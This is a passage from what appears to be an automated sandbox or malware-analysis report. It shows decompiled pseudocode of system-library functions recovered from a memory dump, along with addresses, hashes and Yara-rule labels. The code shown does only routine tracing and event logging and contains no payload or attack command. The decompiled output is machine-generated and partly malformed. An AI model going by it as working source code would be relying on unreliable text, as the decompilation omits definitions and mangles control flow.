				return E0102B640(_t11, _t17, _v8 ^ _t29, 0xfcbf15, _t27, _t28);
			}

0x00fe58fb
0x00fe58fe
0x00fe5906
0x00fe590a
0x00fe593c
0x00fe593c
0x00fe590c
0x00fe590c
0x00fe5911
0x00000000
0x00fe5913
0x00fe5913
0x00fe5913
0x00fe5911
0x00fe591d
0x01041035
0x0104103c
0x0104103f
0x01041056
0x01041056
0x00fe593b

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210f73e90b41f48b4c39b90a176eaef11ec33076dab5b4fff91cd4b8b6e5f71d
Instruction ID: 8fc426d3a670e06d0223b2d907837572ff3d11efb5e0f96ae89d479e0e3d1d42
Opcode Fuzzy Hash: 210f73e90b41f48b4c39b90a176eaef11ec33076dab5b4fff91cd4b8b6e5f71d
Instruction Fuzzy Hash: 6001F232A00A09DBC724EE6ADC01BEE77BCEF80A34F554079AE459B245DE30ED01D790

Uniqueness

Uniqueness Score: -1.00%

Function 00FFB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FFB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01007D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01067016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x00ffb037
0x00ffb039
0x00ffb03b
0x00ffb040
0x0104a60e
0x00000000
0x00000000
0x0104a61d
0x00ffb04b
0x00ffb04e
0x0104a627
0x0104a634
0x00000000
0x00000000
0x0104a641
0x0104a653
0x0104a643
0x0104a64c
0x0104a64c
0x0104a65b
0x00000000
0x00000000
0x00000000
0x0104a66c
0x00ffb057
0x00ffb057
0x00ffb057
0x00ffb046
0x00ffb046
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: a15b7bc070729fc155c542b5f1638e5bfdb652052bd89e315d1cf71dfa2b53fd
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 75015A72644984DFE322975CC988F7677E8EF85B50F0900A1BA5ACBAA1DB28DC40D620

Uniqueness

Uniqueness Score: -1.00%

Function 010B1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010B1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E010B165E(__ebx, 0x10d8ae4, (__edx -  *0x10d8b04 >> 0x14) + (__edx -  *0x10d8b04 >> 0x14), __edi, __ecx, (__edx -  *0x10d8b04 >> 0x14) + (__edx -  *0x10d8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E010AAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01007D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0109FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x010b1074
0x010b1080
0x010b1082
0x010b108a
0x010b108f
0x010b1093
0x010b10ab
0x010b10ab
0x010b10c3
0x010b10cf
0x010b10e1
0x010b10d1
0x010b10da
0x010b10da
0x010b10e9
0x010b10f5
0x010b10f5
0x010b10fe

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0557e17ac9c216f0c8bf641c668ac1c2973ec041b83188fe23e2912dfc388978
Instruction ID: 7e9556f2d4d8b620471b73238e4b73f2484be70ab88b82645eec5e95dc2dbbd2
Opcode Fuzzy Hash: 0557e17ac9c216f0c8bf641c668ac1c2973ec041b83188fe23e2912dfc388978
Instruction Fuzzy Hash: 7E014772614742DFD751EF68D880B9B7BE9BB94310F04CA2AF9C583290EE74D840CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0109FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0109FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x10dd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0102FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01007D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0102B640(E01029AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0109fe3f
0x0109fe3f
0x0109fe4e
0x0109fe58
0x0109fe5d
0x0109fe5f
0x0109fe6a
0x0109fe72
0x0109fe75
0x0109fe78
0x0109fe83
0x0109fe95
0x0109fe85
0x0109fe8e
0x0109fe8e
0x0109fea0
0x0109fea1
0x0109fea3
0x0109fea8
0x0109febd

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26280a12c5fbae04b2071186c0fcf30da3839c188b451a01a294e859dd207cc
Instruction ID: 5b687b6be8b3d7caff62e93fba0b95da945edba846b6920b4a07a4772caaadf0
Opcode Fuzzy Hash: d26280a12c5fbae04b2071186c0fcf30da3839c188b451a01a294e859dd207cc
Instruction Fuzzy Hash: 8101A771E01219AFDB14DFA9D846FAEBBB8EF44B10F004066F940EB381DA74D941C794

Uniqueness

Uniqueness Score: -1.00%

Function 0109FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0109FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x10dd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0102FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01007D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0102B640(E01029AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0109fec0
0x0109fec0
0x0109fecf
0x0109fed9
0x0109fede
0x0109fee0
0x0109feeb
0x0109fef3
0x0109fef6
0x0109fef9
0x0109ff04
0x0109ff16
0x0109ff06
0x0109ff0f
0x0109ff0f
0x0109ff21
0x0109ff22
0x0109ff24
0x0109ff29
0x0109ff3e

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73162b78a29a9d6d6c58ae92e42a1f207980f72ccfc3b3d6c42c31e3823b91d4
Instruction ID: e79f620ec48b3ca74acee8564550b44a9f30b972cfbaa617a8b4d18f0cd3f5d5
Opcode Fuzzy Hash: 73162b78a29a9d6d6c58ae92e42a1f207980f72ccfc3b3d6c42c31e3823b91d4
Instruction Fuzzy Hash: 29018F71A01219AFDB14EBA9D856FAEBBB8EF45700F004066F940EB280EA74DA01C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 010B8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E010B8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x10dd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01007D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0102B640(E01029AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x010b8a62
0x010b8a71
0x010b8a79
0x010b8a82
0x010b8a85
0x010b8a89
0x010b8a8c
0x010b8a8f
0x010b8a92
0x010b8a95
0x010b8a9f
0x010b8ab1
0x010b8aa1
0x010b8aaa
0x010b8aaa
0x010b8abc
0x010b8abd
0x010b8abf
0x010b8ac4
0x010b8ada

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f85cb65f7fb1171df674bfd8cd92ffc86a5094b71a21d34b34ead636cfa1fd1
Instruction ID: 3813b057b2526b14c57cc288b9ab10974f06f83c3581470d134b05560658fba4
Opcode Fuzzy Hash: 9f85cb65f7fb1171df674bfd8cd92ffc86a5094b71a21d34b34ead636cfa1fd1
Instruction Fuzzy Hash: 40012C71A0121DAFDB00DFA9D9819EEBBB8EF58710F10405AF944E7391DA34A900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010B8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E010B8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x10dd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01007D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0102B640(E01029AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x010b8ed6
0x010b8ee5
0x010b8eed
0x010b8ef0
0x010b8efa
0x010b8f03
0x010b8f0c
0x010b8f15
0x010b8f24
0x010b8f27
0x010b8f31
0x010b8f43
0x010b8f33
0x010b8f3c
0x010b8f3c
0x010b8f4e
0x010b8f4f
0x010b8f51
0x010b8f56
0x010b8f69

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89316e4c11f67d46ebebe962dd541bfe57c46477bf2f8dfe92ef25a4000538e6
Instruction ID: c40c292d34b26a92bf8f6b364e2459358bd9d08ed60498ec5dc9dcb6538784ad
Opcode Fuzzy Hash: 89316e4c11f67d46ebebe962dd541bfe57c46477bf2f8dfe92ef25a4000538e6
Instruction Fuzzy Hash: 8C11127090021A9FDB04DFA8D441BAEB7F4FF08300F0442A6E958EB381D6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FEDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FEDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E00FEDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E00FEE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L00FEE8B0(__ecx, _t14, 0xfff);
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x00fedb64
0x00fedb66
0x00fedb6b
0x00fedbaa
0x00fedb71
0x00fedb76
0x00fedb7a
0x00fedba3
0x00fedb7c
0x00fedb87
0x00fedb8b
0x01044fa1
0x01044fb3
0x01044fb8
0x00fedb91
0x00fedb96
0x00fedb98
0x00fedb98
0x00fedb8b
0x00fedb7a
0x00fedb9d
0x00fedba2

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 3fa56ed1a676026e5725350dea56d1ebf626d82cb8bdb51708f909da3cbd437d
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 59F0F6336016A29BD3326A5788C0F6BB6959FC1B60F270035F2059BB44DB648C02B6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FEB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01007D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01007D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01067016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x00feb1e8
0x00feb1ea
0x00feb1f3
0x01044a17
0x00feb1f9
0x00feb1f9
0x00feb1f9
0x00feb201
0x01044a21
0x01044a2e
0x00000000
0x00000000
0x01044a3b
0x01044a4d
0x01044a3d
0x01044a46
0x01044a46
0x01044a55
0x00000000
0x00000000
0x00000000
0x00feb20a
0x00feb20a
0x00feb20a
0x00feb20a

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 1be52f6ce03d66908950e4889c62fda819dbaa2d8fdea1b274ea4fa53bd8a855
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: BB018632600580ABE723975EC844F5A7BD9EF51754F0940B1FA94CB6B1D779D810D215

Uniqueness

Uniqueness Score: -1.00%

Function 0107FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0107FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x10dd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01007D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0102B640(E01029AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0107fe96
0x0107fe9e
0x0107fea1
0x0107fead
0x0107feb3
0x0107feb9
0x0107fec3
0x0107fed5
0x0107fec5
0x0107fece
0x0107fece
0x0107fee0
0x0107fee1
0x0107fee3
0x0107fee8
0x0107fefb

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06b148382c85410770f972d2ade3260bd228fdc91a13334e2cc69cfa4a87367a
Instruction ID: 54760274d1fdb401afd81ba46593f002c42d8829621a6e1b52c7ad80654a5251
Opcode Fuzzy Hash: 06b148382c85410770f972d2ade3260bd228fdc91a13334e2cc69cfa4a87367a
Instruction Fuzzy Hash: 55016270A00219AFCB14DFA8D546AAEB7F4EF08704F1045A9E994DB382DA35E901CB84

Uniqueness

Uniqueness Score: -1.00%

Function 010A131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E010A131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x10dd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01007D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0102B640(E01029AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x010a131b
0x010a132a
0x010a1330
0x010a1336
0x010a133e
0x010a1341
0x010a1344
0x010a134f
0x010a1361
0x010a1351
0x010a135a
0x010a135a
0x010a136c
0x010a136d
0x010a136f
0x010a1374
0x010a1387

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac8ea6262447fb003824d8241636b6c7b686ba972da5cbf044c9ecea47faeed
Instruction ID: bc1a7629eb0b2b29867d1faf255cf0ff8bf26b8fc6d81b964c842fa3ac1f8cb9
Opcode Fuzzy Hash: 7ac8ea6262447fb003824d8241636b6c7b686ba972da5cbf044c9ecea47faeed
Instruction Fuzzy Hash: 71011D71A01219AFCB14EFA9D545AAEB7F4EF18700F408059F995EB381E6349A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 010B8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E010B8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x10dd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01007D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0102B640(E01029AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x010b8f6a
0x010b8f79
0x010b8f81
0x010b8f84
0x010b8f8b
0x010b8f91
0x010b8f94
0x010b8f9e
0x010b8fb0
0x010b8fa0
0x010b8fa9
0x010b8fa9
0x010b8fbb
0x010b8fbc
0x010b8fbe
0x010b8fc3
0x010b8fd6

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ea447d3c97c0990f60f51177d2a3184ff81096bf24dfb2995f0a46e9eb3440
Instruction ID: 1441c420ec019d273d94a426e35c5d57b7d2bd03afcaa0fe4dad03ed997471f2
Opcode Fuzzy Hash: e6ea447d3c97c0990f60f51177d2a3184ff81096bf24dfb2995f0a46e9eb3440
Instruction Fuzzy Hash: B1014474A0121DAFDB10EFA8D545AAEB7F4EF18300F10805AF985EB390DA34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 010A1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E010A1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x10dd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01007D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0102B640(E01029AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x010a1608
0x010a1617
0x010a161d
0x010a1625
0x010a1628
0x010a162b
0x010a1636
0x010a1648
0x010a1638
0x010a1641
0x010a1641
0x010a1653
0x010a1654
0x010a1656
0x010a165b
0x010a166e

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11ca568d5c914f2f14a0f1d043b7e5670a2a3e5354f0555cb8aaab8ba190545
Instruction ID: 15d16489a84d3e1c8945ce06b3cfb78e9936cc9351021d3fe7d5c7633e741c3b
Opcode Fuzzy Hash: b11ca568d5c914f2f14a0f1d043b7e5670a2a3e5354f0555cb8aaab8ba190545
Instruction Fuzzy Hash: BDF06D71A01258EFDB14EFE8D505AAEBBF4EF18300F4440A9E995EB381EA34D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0100C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0100C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xfc11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E010B88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0100c577
0x0100c57d
0x0100c581
0x0100c5b5
0x0100c5b9
0x0100c5ce
0x0100c5ce
0x0100c5ca
0x00000000
0x0100c5ca
0x0100c5c4
0x0100c5c8
0x00000000
0x00000000
0x00000000
0x0100c5ad
0x00000000
0x0100c5af

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664ba32db913d90f7e3ca48c2eab68f1d62d09857730038bcdea94968650c6c1
Instruction ID: 934a5e6c76ad90f98ea0121cf32c6a456d8e580be7b82af95eb149803e83be42
Opcode Fuzzy Hash: 664ba32db913d90f7e3ca48c2eab68f1d62d09857730038bcdea94968650c6c1
Instruction Fuzzy Hash: E8F0F0BA8113908FF773831C8244B627FD89B05232F4486E7D586831C2D3A6CCC0C240

Uniqueness

Uniqueness Score: -1.00%

Function 010B8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E010B8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x10dd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01007D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0102B640(E01029AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x010b8d34
0x010b8d43
0x010b8d4b
0x010b8d4e
0x010b8d52
0x010b8d5c
0x010b8d6e
0x010b8d5e
0x010b8d67
0x010b8d67
0x010b8d79
0x010b8d7a
0x010b8d7c
0x010b8d81
0x010b8d94

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e983db144cafb4fb72ae75c5c07aeca8bd682253a4cd96c04ef993ab996f45
Instruction ID: 676deb98961a4b87ddf4b723d48212221fd23fac06b93a3431f47c0307cfa3f3
Opcode Fuzzy Hash: e2e983db144cafb4fb72ae75c5c07aeca8bd682253a4cd96c04ef993ab996f45
Instruction Fuzzy Hash: 83F05470A44619AFDB14EFB8D545AAE77B8EF18700F50809AE985EB291EA38D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 010A2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E010A2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0109FD22(__ecx);
				_t19 =  *0x10d849c - _t3; // 0x12cf9390
				if(_t19 == 0) {
					__eflags = _t17 -  *0x10d8748; // 0x0
					if(__eflags <= 0) {
						E010A1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x10d8724 & 0x00000004;
							if(( *0x10d8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
